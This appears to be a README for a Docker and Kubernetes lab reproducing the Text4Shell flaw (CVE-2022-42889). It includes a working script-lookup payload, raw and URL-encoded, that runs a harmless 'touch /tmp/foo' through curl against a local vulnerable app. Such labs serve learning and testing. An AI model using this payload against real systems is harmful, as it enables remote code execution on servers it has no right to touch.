Text4Shell CVE-2022-42889

Docker Lab for CVE-2022-42889

You can either build the Docker image locally or pull the image from Docker Hub and run the container.

Clone the repo

git clone https://github.com/devenes/text4shell-cve-2022-42889.git

Build the Docker image locally

docker build --tag=text4shell .

Run the Docker container

docker run -d --rm -p 8080:8080 text4shell

Or pull the image from Docker Hub and run the container

docker pull devenes/text4shell:v1.0
docker run -d --rm -p 8080:8080 devenes/text4shell:v1.0

Test the app by passing a string to the `search` parameter:

curl http://localhost/text4shell/attack?search=<anything>

Attack can be performed by passing a string ${prefix:name} where the prefix is the aforementioned lookup:

${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}

Attack using `curl`:

curl -X GET "http://localhost:8080/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Ffoo%27%29%7D"

You can also try using dns or url prefixes

Get the container id

docker container ls

Get into the container

docker exec -it <container_id> bash

Check if the RCE attack was successful

You should see a file named foo created in the /tmp directory:

ls /tmp/

You can stop the container by running the following command

docker container stop <container_id>

Kubernetes Lab for CVE-2022-42889

Change the directory to `kubernetes` and follow the instructions in the `README.md` file.

cd kubernetes

Create kind cluster

kind create cluster --config kind-config.yaml

Deploy the vulnerable app to the cluster

kubectl apply -f deployment.yaml

Create a service to expose the app

kubectl apply -f service.yaml

Attack the vulnerable app using `curl`

curl -X GET "http://localhost:8080/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Ffoo%27%29%7D"

Get the pod name using `kubectl get pods`

kubectl get pods

Get into the pod using `kubectl exec`

kubectl exec -it $(kubectl get pods | grep text4shell |awk '{print $1}') -- bash

Check if the attack was successful

ls /tmp/ | grep foo

You can find the detailed tutorial on my Udemy course here

References:

About

Kubernetes Lab for CVE-2022-42889

Languages

Language:Java 50.9%Language:Dockerfile 49.1%

Text4Shell CVE-2022-42889

Docker Lab for CVE-2022-42889

Clone the repo

Build the Docker image locally

Run the Docker container

Or pull the image from Docker Hub and run the container

Test the app by passing a string to the search parameter:

Attack using curl:

Get the container id

Get into the container

Check if the RCE attack was successful

You can stop the container by running the following command

Kubernetes Lab for CVE-2022-42889

Change the directory to kubernetes and follow the instructions in the README.md file.

Create kind cluster

Deploy the vulnerable app to the cluster

Create a service to expose the app

Attack the vulnerable app using curl

Get the pod name using kubectl get pods

Get into the pod using kubectl exec

Check if the attack was successful

You can find the detailed tutorial on my Udemy course here

About

Languages

Test the app by passing a string to the `search` parameter:

Attack using `curl`:

Change the directory to `kubernetes` and follow the instructions in the `README.md` file.

Attack the vulnerable app using `curl`

Get the pod name using `kubectl get pods`

Get into the pod using `kubectl exec`